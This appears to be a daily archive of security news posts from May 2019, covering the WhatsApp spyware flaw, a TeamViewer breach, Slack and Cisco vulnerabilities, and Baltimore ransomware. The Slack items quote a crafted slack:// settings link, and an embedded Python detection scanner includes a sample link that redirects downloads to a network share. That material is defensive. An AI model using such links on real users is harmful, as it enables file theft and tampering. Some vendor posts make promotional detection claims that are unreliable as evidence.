Daily Archives: May 17, 2019

Israeli firm linked to WhatsApp spyware attack faces lawsuit

Amnesty International fears its staff may be ‘surveilled via NSO Pegasus software’

The Israeli firm linked to this week’s WhatsApp hack is facing a lawsuit backed by Amnesty International, which says it fears its staff may be under surveillance from spyware installed via the messaging service.

Chinese state-sponsored hackers breached TeamViewer in 2016

The German newspaper Der Spiegel revealed that the software company behind TeamViewer was compromised in 2016 by Chinese hackers.

China-linked hackers breached the German software company behind TeamViewer in 2016, the German newspaper Der Spiegel reported.

According to the media outlet, Chinese state-sponsored hackers used the Winnti trojan malware to infect the systems of the company.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially motivated and was mostly involved in cyber espionage campaigns. The hackers were known for targeting companies in the online gaming industry; the majority of the victims are located in Southeast Asia.

The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.

According to the company, it was targeted by the hackers in autumn 2016, when its experts detected suspicious activity and quickly blocked it to prevent major damage.

A TeamViewer spokesperson revealed that the company investigated the intrusion attempts but did not find any evidence of exposure of customer data or other sensitive data.

Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.

“In autumn 2016, TeamViewer was target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way,” said a company spokesman.

“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”

At the time, the company published a statement denying that it had been breached by hackers:

“Göppingen/Germany, May 23, 2016. A recent article warns, ‘TeamViewer users have had their bank accounts emptied by hackers gaining full-system access’. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side,” wrote the company.

Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Chinese state-sponsored hackers breached TeamViewer in 2016 appeared first on Security Affairs.

A flaw in Slack could allow hackers to steal, manipulate downloaded files

A recently patched flaw in the Slack desktop application for Windows can be exploited by attackers to steal and manipulate a targeted user’s downloaded files.

Slack is a cloud-based set of proprietary team collaboration tools and services.

Security researcher David Wells from Tenable discovered a critical flaw in version 3.3.7 of the Slack desktop app that could be exploited to steal and manipulate a targeted user’s downloaded files.

The issue is classified as a download hijacking vulnerability that can be triggered by tricking a user into clicking on a specially crafted link pasted into a Slack channel.

Slack addressed the flaw with the release of version 3.4.0.

Wells discovered that it is possible to use slack:// links to change Slack app settings when they are clicked, including the PrefSSBFileDownloadPath setting that specifies the location where a user’s files are downloaded. An attacker could use a specially crafted link that, when clicked, changes the targeted user’s download destination to a path specified by the attacker, for example a remote SMB share.

“Crafting a link like “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}” would change the default download location if clicked (until manually changed back).” reads a blog post published by the expert. “The links however, cannot contain certain characters, as Slack filters them out. One of these characters is the “:” (colon) which means we can’t actually supply a path with drive root. An SMB share, however, completely bypassed this sanitation as there is no root drive needed.”

Wells also discovered that an attacker could manipulate the downloaded file stored in the location they set up.

“Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless.”

An attacker can inject malware into an Office file downloaded by the victim.

The links devised by the expert can be pasted to a Slack channel or a private conversation to which the attacker has access.

But is it possible to post the link in Slack channels of which the attacker is not a member?

The expert discovered that an unauthenticated attacker can change the location of downloaded files using RSS feeds. Slack channels, in fact, can subscribe to RSS feeds to populate a channel with site updates, and those updates can contain links.

In this case, the hacker has to trick the victim into clicking on a specially crafted link in an RSS feed posted online. The download location can be changed even if the attacker does not have access to the victim’s Slack workspace.

“Let’s consider an example with reddit.com, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked,” adds Wells.

“While less effective, these hyperlink attacks could be done without Slack channel authentication, via external .rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks.” Tenable explained.

“This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which .rss feeds the target Slack subscribes to.”

The flaw has been classified as “medium severity” because it requires user interaction. Slack awarded the researcher $500 under its bug bounty program.

Users should check that they are running the latest version.

Pierluigi Paganini

(SecurityAffairs – Slack, hacking)

The post A flaw in Slack could allow hackers to steal, manipulate downloaded files appeared first on Security Affairs.

How MVISION Mobile can combat the WhatsApp Buffer Overflow Vulnerability

A new WhatsApp vulnerability has attracted the attention of the press and security professionals around the world. We wanted to provide some information and a quick summary.

This post will cover vulnerability analysis and how McAfee MVISION Mobile can help.

Background

On May 13th, Facebook announced a vulnerability associated with all of its WhatsApp products. This vulnerability was reportedly exploited in the wild, and it was designated as CVE-2019-3568.

WhatsApp told the BBC its security team was the first to identify the flaw. It shared that information with human rights groups, selected security vendors and the US Department of Justice earlier this month.

The CVE-2019-3568 Vulnerability Explained

WhatsApp suffers from a buffer overflow weakness, meaning an attacker can leverage it to run malicious code on the device. Data packets can be manipulated during the start of a voice call, leading to the overflow being triggered and the attacker commandeering the application. Attackers can then deploy surveillance tools to the device to use against the target.

A buffer overflow vulnerability in WhatsApp VOIP (voice over internet protocol) stack allows remote code execution via a specially-crafted series of SRTP (secure real-time transport protocol) packets sent to a target phone number.

Affected Versions:

  • WhatsApp for Android prior to v2.19.134
  • WhatsApp Business for Android prior to v2.19.44
  • WhatsApp for iOS prior to v2.19.51
  • WhatsApp Business for iOS prior to v2.19.51
  • WhatsApp for Windows Phone prior to v2.18.348
  • WhatsApp for Tizen prior to v2.18.15

The Alleged Exploit

An exploit of the vulnerability was used in an attempted attack on the phone of a UK-based attorney on 12 May, the Financial Times reported. The reported attack involved using WhatsApp’s voice calling function to ring a target’s device. Even if the call was not picked up, the surveillance software could be installed.

How MVISION Mobile can combat CVE-2019-3568 Attacks

To date, the detection technology inside MVISION Mobile has detected 100 percent of zero-day device exploits without requiring an update.

MVISION Mobile helps protect customers by identifying at-risk iOS and Android devices and active threats trying to leverage the vulnerability. It leverages Advanced App Analysis capabilities to help administrators find all devices that are exposed to the WhatsApp vulnerability by identifying every device that has a vulnerable version of WhatsApp installed, and to establish custom policies to address the risk. If the exploit attempts to elevate privileges and compromise the device, MVISION Mobile would detect the attack on the device.

For more information about MVISION Mobile, download our datasheet or visit our web site.

The post How MVISION Mobile can combat the WhatsApp Buffer Overflow Vulnerability appeared first on McAfee Blogs.

New research: How effective is basic account hygiene at preventing hijacking


Every day, we protect users from hundreds of thousands of account hijacking attempts. Most attacks stem from automated bots with access to third-party password breaches, but we also see phishing and targeted attacks. Earlier this year, we suggested how just five simple steps like adding a recovery phone number can help keep you safe, but we wanted to prove it in practice.
We teamed up with researchers from New York University and the University of California, San Diego to find out just how effective basic account hygiene is at preventing hijacking. The year-long study, on wide-scale attacks and targeted attacks, was presented on Wednesday at a gathering of experts, policy makers, and users called The Web Conference.
Our research shows that simply adding a recovery phone number to your Google Account can block up to 100% of automated bots, 99% of bulk phishing attacks, and 66% of targeted attacks that occurred during our investigation.


Google’s automatic, proactive hijacking protection
We provide an automatic, proactive layer of security to better protect all our users against account hijacking. Here’s how it works: if we detect a suspicious sign-in attempt (say, from a new location or device), we’ll ask for additional proof that it’s really you. This proof might be confirming you have access to a trusted phone or answering a question where only you know the correct response.
If you’ve signed into your phone or set up a recovery phone number, we can provide a similar level of protection to 2-Step Verification via device-based challenges. We found that an SMS code sent to a recovery phone number helped block 100% of automated bots, 96% of bulk phishing attacks, and 76% of targeted attacks. On-device prompts, a more secure replacement for SMS, helped prevent 100% of automated bots, 99% of bulk phishing attacks and 90% of targeted attacks.


Both device- and knowledge-based challenges help thwart automated bots, while device-based challenges help thwart phishing and even targeted attacks.

If you don’t have a recovery phone number established, then we might fall back on the weaker knowledge-based challenges, like recalling your last sign-in location. This is an effective defense against bots, but protection rates for phishing can drop to as low as 10%. The same vulnerability exists for targeted attacks. That’s because phishing pages and targeted attackers can trick you into revealing any additional identifying information we might ask for.
Given the security benefits of challenges, one might ask why we don’t require them for all sign-ins. The answer is that challenges introduce additional friction and increase the risk of account lockout. In an experiment, 38% of users did not have access to their phone when challenged. Another 34% of users could not recall their secondary email address.
If you lose access to your phone, or can’t solve a challenge, you can always return to a trusted device you previously logged in from to gain access to your account.


Digging into “hack for hire” attacks
Where most bots and phishing attacks are blocked by our automatic protections, targeted attacks are more pernicious. As part of our ongoing efforts to monitor hijacking threats, we have been investigating emerging “hack for hire” criminal groups that purport to break into a single account for a fee on the order of $750 USD. These attackers often rely on spear phishing emails that impersonate family members, colleagues, government officials, or even Google. If the target doesn’t fall for the first spear phishing attempt, follow-on attacks persist for upwards of a month.


Example man-in-the-middle phishing attack that checks for password validity in real-time. Afterwards, the page prompts victims to disclose SMS authentication codes to access the victim’s account.

We estimate just one in a million users face this level of risk. Attackers don’t target random individuals though. While the research shows that our automatic protections can help delay, and even prevent as many as 66% of the targeted attacks that we studied, we still recommend that high-risk users enroll in our Advanced Protection Program. In fact, zero users that exclusively use security keys fell victim to targeted phishing during our investigation.



Take a moment to help keep your account secure
Just like buckling a seat belt, take a moment to follow our five tips to help keep your account secure. As our research shows, one of the easiest things you can do to protect your Google Account is to set up a recovery phone number. For high-risk users—like journalists, activists, business leaders, and political campaign teams—our Advanced Protection Program provides the highest level of security. You can also help protect your non-Google accounts from third-party password breaches by installing the Password Checkup Chrome extension.

1 Minute Quick Privacy Ref-ernces

If you have a moment take a look at our 1 minute videos to get caught up on the latest things going on in the privacy community. California Consumer Protection Act – Ben Siegel discusses the California Consumer Protection Act and how some of the advancing Amendments can drastically change the CCPA. Privacy Awareness Ideas […]

The post 1 Minute Quick Privacy Ref-ernces appeared first on Privacy Ref Blog.

Cisco AMP for Endpoints excelling in AV Comparatives Business Main Test Series

AV-Comparatives have long been the benchmark of 3rd-party testing in the endpoint security space. This year, for the first time ever, AMP for Endpoints participated in AV-Comparatives malware testing. The Business Main Test Series was broken up into two main sections: the Malware Protection Test and the Business Real-World Protection Test.

While the full report will be released in July, AV-Comparatives released a short fact sheet today. Because the test is only partially completed, the results will continue to vary, but Cisco AMP for Endpoints expects to maintain consistently high scores.

Overview

First, let’s give the brief facts behind the Business Main Test Series:

  • 19 products are participating
  • All products tested on a Windows 10 RS5 64-bit
  • All vendors were allowed to configure their products
  • Cloud and PUA detection activated in all products

Given these parameters, the 19 products will participate in a four-month test culminating in July. At this midpoint, however, the products have participated in the two aforementioned tests.

For more information on specific configurations and a list of all participants, read the full fact sheet here.

Malware Protection Test 

In this test, the products were tested with 1,311 different malware samples. Based on criteria defined by AV-Comparatives in their report, the products were given parameters to detect the malware samples.

So far, AMP for Endpoints is one of eight products to have a malware protection rate of 99.8% or higher. In addition to this extremely high detection rate, AMP for Endpoints registered 0 false alarms on common business software.

AV-Comparatives also performed tests on non-business software. This will not affect the final “Approved Business Product” rating they deliver, but the results are notable because they help demonstrate how well a product can really delineate between good and bad. Cisco AMP for Endpoints was granted the highest rating of “very low”, which denotes 0-5 false positives on non-business software.

Cisco AMP for Endpoints consistently pledges to deliver elite threat detection, investigation, and response. The 99.8% malware protection rate so far highlights Cisco AMP for Endpoint’s ability to deliver on that pledge. At the same time, the low number of false positives shows that Cisco AMP for Endpoints does not need to bog down IT professionals with useless alerts allowing them to focus on what’s really important.

Real-World Protection Test

Over the course of two months, the products encountered 389 test cases. Of those 389 test cases, Cisco AMP for Endpoints has blocked all but three while producing zero false alarms, a 99.2% protection rate so far. Cisco AMP for Endpoints is one of only three products with zero false alarms; others have already flagged up to 18 false alarms.

Conclusion

It is important to note that this test has not concluded. We are, however, very excited for a continued strong showing from Cisco AMP for Endpoints in the second half of the test. So far, Cisco AMP for Endpoints has already shown an elite combination of threat detection, investigation, and response combined with low false positives designed to empower IT professionals to quickly identify and respond to threats.

For more on the report, click here.

To try AMP for Endpoints for free, sign up for the free trial.

Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware

Reading Time: ~2 min.

WhatsApp Exploited to Install Spyware through Calls

A serious flaw has been discovered in the messaging app WhatsApp that would allow an attacker to install spyware on a victim’s device by manipulating the packets being sent during the call. Further disguising the attack, the malicious software could be installed without the victim answering the call, and with access to the device the attacker could also delete the call log. Fortunately, the Facebook-owned app was quick to respond and quickly released an update for affected versions. 

SIM Swapping Group Officially Charged

Nine men in their teens and 20s have been arrested and charged for a SIM-swapping operation that netted the group over $2 million in stolen cryptocurrency. The group operated by illicitly gaining access to phone accounts by having the phone swapped to a SIM card in their control. The group would then fraudulently access cryptocurrency accounts by bypassing 2-factor authentication, since login codes were sent to devices under their control. Three of the group were former telecom employees with access to the systems needed to execute the scam.

Web Trust Seal Injected with Keylogger

A recent announcement revealed that scripts for the “Trust Seals” provided by Best of the Web to highly-rated websites were compromised and redesigned to capture keystrokes from site visitors. While Best of the Web was quick to resolve the issue, at least 100 sites are still linking customers to the compromised seals. This type of supply chain attack has risen in popularity recently. Hackers have been seen injecting payment-stealing malware into several large online retailers’ websites since the beginning of the year.

Fast Retailing Data Breach

The online vendor Fast Retailing is currently investigating a data breach that gave attackers full access to nearly half a million customer accounts for two of the brand’s online stores. The attack took place within the last three weeks and targeted payment information with names and addresses for customers of UNIQLO Japan and GU Japan. Fast Retailing has since forced a password reset for all online customers and delivered emails with further information for those affected by the attack.

Data Leak in Linksys Routers

Last week researchers discovered a flaw in over 25,000 Linksys routers that could give attackers access to not only the device’s MAC address, but also device names and other critical settings that could compromise the security of anyone using the router. Additionally, by identifying the device’s IP address, attackers could even use geolocation to gauge the approximate location of the exploited device, all without authentication.

The post Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware appeared first on Webroot Blog.

Cisco addressed a critical flaw in networks management tool Prime Infrastructure

Cisco has issued security updates to address 57 security flaws, including three flaws in the network management tool Prime Infrastructure.

One of the flaws addressed by Cisco in the Prime Infrastructure management tool could be exploited by an unauthenticated attacker to execute arbitrary code with root privileges on PI devices.

“Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow a remote attacker to gain the ability to execute arbitrary code with elevated privileges on the underlying operating system.” reads the advisory published by Cisco.

“One of these issues, CVE-2019-1821, can be exploited by an unauthenticated attacker that has network access to the affected administrative interface.”

The remaining two issues, tracked as CVE-2019-1822 and CVE-2019-1823, could be exploited by an attacker that has valid credentials to authenticate to the impacted administrative interface.

The flaws affect Cisco Prime Infrastructure Software releases prior to 3.4.1, 3.5, and 3.6, and EPN Manager Releases prior to 3.0.1.

The vulnerabilities were discovered by Steven Seeley of Source Incite.

“These vulnerabilities exist because the software improperly validates user-supplied input,” continues the advisory. “An attacker could exploit these vulnerabilities by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.”

Cisco PSIRT experts are not aware of any attacks exploiting the flaws in the wild.

A few days ago, Cisco fixed Thrangrycat, a vulnerability tracked as CVE-2019-1649 that affects multiple Cisco products supporting the Trust Anchor module (TAm). The issue could be exploited by an attacker to fully bypass the TAm via Field Programmable Gate Array (FPGA) bitstream manipulation.

Pierluigi Paganini

(SecurityAffairs – Cisco Prime infrastructure, hacking)

The post Cisco addressed a critical flaw in networks management tool Prime Infrastructure appeared first on Security Affairs.

This Week in Security News: Unsecured Servers and Vulnerable Processors

 

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about vulnerabilities that can allow hackers to retrieve data from CPUs and mine cryptocurrency.

Read on:

May’s Patch Tuesday Include Fixes for ‘Wormable’ Flaw in Windows XP, Zero-Day Vulnerability

Microsoft’s May security release includes updates for 80 vulnerabilities for a number of Microsoft products, including a security update for unsupported operating systems such as Windows XP and Server 2003.

Trend Micro Unveils Cloud-Native Security Customized to the Demand of DevOps

Trend Micro launched container security capabilities added to Trend Micro Deep Security to elevate protection across the entire DevOps lifecycle and runtime stack.

Side-Channel Attacks RIDL, Fallout, and ZombieLoad Affect Millions of Vulnerable Intel Processors

Researchers found a bevy of critical vulnerabilities in modern Intel processors that, when exploited successfully, can leak or let hackers retrieve data being processed by the vulnerable CPUs.

Trump Issues Executive Order Paving Way for Ban on Huawei

President Trump has issued an executive order declaring a national emergency and prohibiting U.S. companies from using telecom services that are solely owned, controlled, or directed by a foreign adversary, clearing the way for a ban on the Chinese-owned Huawei.

Unsecured Server Leaks PII of Almost 90% of Panama Residents

The personally identifiable information of almost 90% of Panama’s population has been divulged due to an unsecured Elasticsearch server that was found without authentication or firewall protection, connected to the internet, and publicly viewable on any browser.

Google Discloses Security Bug in its Bluetooth Titan Security Keys, Offers Free Replacement

Google says that the security bug, which could allow an attacker in close physical proximity to circumvent the security the key is supposed to provide, is due to a “misconfiguration in the Titan Security Keys’ Bluetooth pairing protocols.”

Jenkins Vulnerability Exploited to Drop Kerberods Malware and Launch Monero Miner

Threat actors were found exploiting CVE-2018-1000861, a vulnerability in the Stapler web framework that is used by the Apache Jenkins open-source software development automation server with versions 2.153 and earlier.

Crypto Exchange Binance Restarting Services After Post-Hack Upgrade

Cryptocurrency exchange Binance has announced that it is back online after completing a security upgrade prompted by a recent hack that saw 7,000 BTC worth $41 million stolen.

Do you worry about your personally identifiable information being divulged to cyber criminals? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

 

 


Download Hijack Flaw Patched in Slack Patches for Windows

Slack users have been urged to upgrade their applications and clients to the most recent version, 3.4.0, after Tenable researcher David Wells discovered a new vulnerability that would allow an attacker to share malicious hyperlinks that could alter where a victim’s files were stored.

Wells discovered a download hijack vulnerability in Slack Desktop version 3.3.7 for Windows. “This vulnerability, which has been patched, would have allowed an attacker to post a crafted hyperlink into a Slack channel or private conversation that changes the document download location path when clicked. It does require user interaction to exploit, giving it a CVSSv2 score of 5.5 (Medium),” today’s press release said.

If users click on the link, an attacker could not only steal future documents downloaded within Slack but also manipulate them, such as injecting malicious code that would compromise the victim’s machine once opened, according to Wells.

The attack reportedly can be performed through any Slack direct messaging or Slack channel to which an attacker might be authenticated.

“Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview,” which Wells discusses in depth in his blog post.

The flaw was found in the Slack desktop application for Windows version 3.3.7, which Tenable reported to Slack via HackerOne. “Slack patched the bug as part of its latest update for Slack Desktop Application for Windows, v3.4.0. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. As always, users are encouraged to upgrade their apps and clients to the latest available version,” a Slack spokesperson said.

“The digital economy and global distributed workforce have brought new technologies to market with the ultimate goal of seamless connectivity,” said Renaud Deraison, co-founder and chief technology officer, Tenable. “But it’s critical that organizations realize this emerging technology is potentially vulnerable and part of their expanding attack surface. Tenable Research continues to work with vendors such as Slack to disclose our discoveries to ensure consumers and organizations are secure.”
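Both Slack posts on this page (this one and the earlier “A flaw in Slack could allow hackers to steal, manipulate downloaded files”) describe the same mechanism: a `slack://settings/?update={...}` link that rewrites `PrefSSBFileDownloadPath`, a client filter that drops the `:` character so no drive-rooted path can be supplied, and a UNC share path that needs no drive root and so gets through. The following Python is an added example, not Slack’s or Tenable’s code, of what a defender can do with that description: a version check against the 3.4.0 fix release and a scanner that flags settings links in channel messages or RSS items that touch the download path, rating share paths higher. The regexes, the severity labels, the `scan_text`/`scan_items` helpers and the sample messages are all assumptions constructed for this example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Added example (hypothetical helper, not Slack's or Tenable's code).
# Facts taken from the posts: slack://settings/?update={...} links could
# rewrite PrefSSBFileDownloadPath in Slack Desktop for Windows before 3.4.0,
# the client stripped ":" so a drive-rooted path could not be supplied, and
# a UNC share path needed no drive root. Everything else here is assumed.

PATCHED_VERSION = (3, 4, 0)           # first fixed Slack Desktop for Windows release
DOWNLOAD_PATH_SETTING = "PrefSSBFileDownloadPath"

SLACK_LINK_RE = re.compile(r"slack://\S+", re.IGNORECASE)
# Tolerant key/value extractor: the advisory shows the payload with single
# quotes, and backslashes in share paths are not valid JSON escapes, so a
# strict JSON parser would reject exactly the links we want to catch.
PAIR_RE = re.compile(r"""['"]?(\w+)['"]?\s*:\s*['"]([^'"]*)['"]""")


def parse_version(version):
    """'3.3.7' -> (3, 3, 7); short strings are padded so '3.4' == 3.4.0."""
    parts = [int(p) for p in version.strip().lstrip("vV").split(".")]
    return tuple((parts + [0, 0, 0])[:3])


def is_vulnerable_version(version):
    """True for any Slack Desktop for Windows build older than 3.4.0."""
    return parse_version(version) < PATCHED_VERSION


def parse_settings_update(link):
    """Return the key/value pairs carried by a slack://settings/?update=...
    link, or None when the link is not a settings update."""
    url = urlparse(link)
    if url.scheme.lower() != "slack" or url.netloc.lower() != "settings":
        return None
    payload = parse_qs(url.query).get("update")
    if not payload:
        return None
    return dict(PAIR_RE.findall(payload[0]))


def is_unc_path(path):
    """Network-share path (\\\\host\\share or //host/share): the form that needs
    no drive root and therefore survives the colon filter."""
    return path.startswith("\\\\") or path.startswith("//")


def scan_text(text, source="unknown"):
    """Flag every settings link in one message or feed item that rewrites the
    download path. Returns a list of finding dicts, empty when clean."""
    findings = []
    for match in SLACK_LINK_RE.finditer(text):
        link = match.group(0).rstrip(".,;)")
        settings = parse_settings_update(link)
        if not settings or DOWNLOAD_PATH_SETTING not in settings:
            continue
        path = settings[DOWNLOAD_PATH_SETTING]
        findings.append({
            "source": source,
            "link": link,
            "new_download_path": path,
            # a share path means downloads leave the machine: treat as high
            "severity": "high" if is_unc_path(path) else "medium",
        })
    return findings


# Constructed sample inputs: two Slack messages, one RSS item, one harmless
# deep link. 203.0.113.10 is a documentation address, not a real host.
SAMPLE_ITEMS = [
    ("channel:#general", "Quarterly numbers: https://intranet.example/report.xlsx"),
    ("channel:#random",
     r"have a look slack://settings/?update={'PrefSSBFileDownloadPath':'\\203.0.113.10\share'}"),
    ("rss:vendor-feed",
     "Read more: slack://settings/?update={'PrefSSBFileDownloadPath':'downloads\\staging'} (feed)"),
    ("channel:#ops", "deep link: slack://channel?team=T000&id=C000"),
]


def scan_items(items):
    """Run scan_text over (source, text) pairs and collect the findings."""
    findings = []
    for source, text in items:
        findings.extend(scan_text(text, source))
    return findings


if __name__ == "__main__":
    for finding in scan_items(SAMPLE_ITEMS):
        print(finding["severity"].upper(), finding["source"], "->", finding["new_download_path"])
    print("3.3.7 vulnerable:", is_vulnerable_version("3.3.7"))
```

The scanner only sees links that are literally present in the text; the Reddit variant Wells describes hides the `slack://` link behind an `http` redirect, so feed content should be checked after following redirects, or the client simply kept at 3.4.0 or later, which removes the need for the check.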

Episode 495 – Tools, Tips and Tricks – Mozilla Observatory

This week’s tools, tips and tricks is about Mozilla Observatory. This is a web scanner meant to help developers and security professionals fix and make their web apps more secure. Mozilla Observatory. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five Don’t forget to subscribe […]

The post Episode 495 – Tools, Tips and Tricks – Mozilla Observatory appeared first on Security In Five.

More Orgs Use Booby Traps for Counterintelligence

A recent survey found that, to gain counterintelligence, the vast majority of organizations would allow an attacker to take decoy files rather than stop an attack in progress, according to the latest International Cyber Benchmark Index from the Neustar International Security Council (NISC).

A reported one in five companies are currently employing forensic investigations, as well as setting up honey pots and repositories of fake data to lure attackers in, but an impressive 71% of respondents said that instead of shutting down an attack when a bad actor accesses a deceptive file, they would be willing to let the malicious actors take a booby-trapped document, according to a May 16 press release.

Being able to collect intelligence could allow defenders to identify thieves in the future, potentially revealing information about the location, ownership and possible vulnerabilities of the hackers’ machines, the press release said.

Of the respondents surveyed, 51% said their enterprise had suffered a distributed denial-of-service (DDoS) attack, and 52% of participants also identified phishing as a growing threat with targeted hacking. DDoS attacks followed close behind at 49%.

“Security leaders increasingly feel that breaches are inevitable, and there is a growing appetite for advanced forensic tools that can deliver insights around attacker attribution and tactics in real time,” said Rodney Joffe, chairman of NISC and Neustar SVP and fellow.

“Whether they opt to use them like an alarm system, ejecting bad actors from the network upon contact with a honey pot or deceptive file, or for a more sophisticated counterintelligence operation that gathers vital information on attacker movements and methods, cybersecurity professionals want solutions that can provide better real-time awareness and understanding of the enemy.”

According to the survey, the threat of social engineering continues to rise across all vectors, with 48% of respondents admitting they witnessed an uptick in attempts via email, 38% noting a rise in text-based attempts and 36% reporting a rise in attempts via phone.

Responses showed that security pros are more aware not only of where attacks are originating but also of the types of attacks that pose the greatest threats.

Baltimore Won’t Pay Ransom, Systems Remain Down


The city of Baltimore’s computer systems have remained down since a ransomware attack hit more than a week ago, but the city says it will not pay the ransom despite today’s final 10-day deadline, according to a copy of the ransom note obtained by the Baltimore Sun.

The May 7 note warned that if the ransom were not paid within 10 days, the city would no longer be able to have its files returned. In the aftermath of the attack, Baltimore has reverted to using manual systems while it continues efforts to restore the downed system.

From the transportation department to the department of public works and even closing on real estate deals, everything is being held up in what CCN called “the most extensive attacks in history, affecting nearly every important aspect of city life.”

Despite the attackers’ warning that they would cut off contact if the city called the FBI, federal investigators are assisting in the efforts to free the crippled city. The message from Mayor Jack Young is clear – the city will not pay the ransom, according to WMAR.

As the city struggles to free itself from the constraints of this attack, city officials are looking for ways to be better prepared for future attacks. On May 16, Baltimore city council president Brandon Scott said he was launching a committee on cybersecurity and emergency preparedness.

“This cyber attack against Baltimore City government is a crisis of the utmost urgency,” Scott said, according to The Hill. “That is why I will convene a select committee, co-chaired by Councilman Eric Costello and Councilman Isaac ‘Yitzy’ Schleifer, to examine the City's coordination of cybersecurity efforts, including the Administration's response to the cybersecurity attack and testimony from cybersecurity experts.”

WhatsApp Will Never be Safe, Says Telegram Founder

In a direct attack on WhatsApp, Telegram founder Pavel Durov has stated that the Facebook-owned WhatsApp would never be safe.

In a statement he published on Telegraph, Pavel Durov points out that hackers could access anything (photos, emails, texts, etc.) on any phone that had WhatsApp installed. He also discusses the security issue WhatsApp recently faced: a high-severity bug that could allow hackers to remotely inject spyware into a phone simply by making a WhatsApp call.

Durov writes, “Every time WhatsApp has to fix a critical vulnerability in their app, a new one seems to appear in its place. All of their security issues are conveniently suitable for surveillance, and look and work a lot like backdoors.”

He points out that, unlike Telegram, WhatsApp is not an open source platform, so security researchers cannot easily check whether there are backdoors in its code. Instead of publishing its code, WhatsApp deliberately obfuscates its apps’ binaries so that no one is able to study them thoroughly, he adds.

Durov explains that back in 2012, when he was working to develop Telegram, WhatsApp was still transferring messages in plain-text in transit and not just governments or hackers, but mobile providers and even Wi-Fi admins had access to all WhatsApp texts.

WhatsApp later added some encryption, but the key to decrypt messages was available with several governments, who could thus decrypt conversations on WhatsApp very easily. Durov says, “Then, as Telegram started to gain popularity, WhatsApp founders sold their company to Facebook and declared that “Privacy was in their DNA”. If true, it must have been a dormant or a recessive gene.”

Discussing how the end-to-end encryption introduced in 2016 by WhatsApp works, Pavel Durov says, “3 years ago WhatsApp announced they implemented end-to-end encryption so “no third party can access messages“. It coincided with an aggressive push for all of its users to back up their chats in the cloud. When making this push, WhatsApp didn’t tell its users that when backed up, messages are no longer protected by end-to-end encryption and can be accessed by hackers and law enforcement. Brilliant marketing, and some naive people are serving their time in jail as a result.”

Durov also explains that those who do not back up their chats could still be traced in many ways. He says that the metadata generated by WhatsApp users is leaked to various agencies in large volumes by WhatsApp’s parent company. On top of all this, critical vulnerabilities keep appearing one after another.

He writes, “WhatsApp has a consistent history – from zero encryption at its inception to a succession of security issues strangely suitable for surveillance purposes. Looking back, there hasn’t been a single day in WhatsApp’s 10 year journey when this service was secure. That’s why I don’t think that just updating WhatsApp’s mobile app will make it secure for anyone.”

In his statement, Durov explains why people can’t stop using WhatsApp all of a sudden. He says that a lot of people can’t do this because their friends and families still continue to use WhatsApp. He writes, “It means we at Telegram did a bad job of persuading people to switch over. While we did attract hundreds of millions of users in the last five years, this wasn’t enough. The majority of internet users are still held hostage by the Facebook/WhatsApp/Instagram empire. Many of those who use Telegram are also on WhatsApp, meaning their phones are still vulnerable.”

Durov says this about Telegram: “In almost 6 years of its existence, Telegram hasn’t had any major data leak or security flaw of the kind WhatsApp demonstrates every few months. In the same 6 years, we disclosed exactly zero bytes of data to third-parties, while Facebook/WhatsApp has been sharing pretty much everything with everybody who claimed they worked for a government.”

He explains that unlike Facebook, which has a huge marketing department, Telegram does zero marketing and wouldn’t want to pay journalists and researchers to write about it. It instead relies on its users.

Well, that’s the gist of what the Telegram founder has to say. Let’s wait for the other side of the story, and see whether WhatsApp comes up with its own statement defending itself in response to what Pavel Durov has written.

Source: https://gbhackers.com/whatsapp-will-never-be-secure/


The post WhatsApp Will Never be Safe, Says Telegram Founder appeared first on .

Why Are Cryptographers Being Denied Entry into the US?

In March, Adi Shamir -- that's the "S" in RSA -- was denied a US visa to attend the RSA Conference. He's Israeli.

This month, British citizen Ross Anderson couldn't attend an awards ceremony in DC because of visa issues. (You can listen to his recorded acceptance speech.) I've heard of at least one other prominent cryptographer who is in the same boat. Is there some cryptographer blacklist? Is something else going on? A lot of us would like to know.

Stack Overflow Discloses Digital Attack against Production Systems

Stack Overflow, a popular question and answer site for programmers, disclosed a digital attack in which bad actors accessed its production systems. Mary Ferguson, VP of Engineering at the company, publicly revealed the incident on 16 May. In a statement posted to Stack Overflow’s website, she explained that someone had obtained production-level access to the […]

The post Stack Overflow Discloses Digital Attack against Production Systems appeared first on The State of Security.

Hacktivist Attacks Have Fallen 95% Since 2015


The number of publicly disclosed hacktivist attacks has dropped by 95% between 2015 and 2018 thanks to the relative decline of Anonymous, new stats from IBM X-Force have revealed.

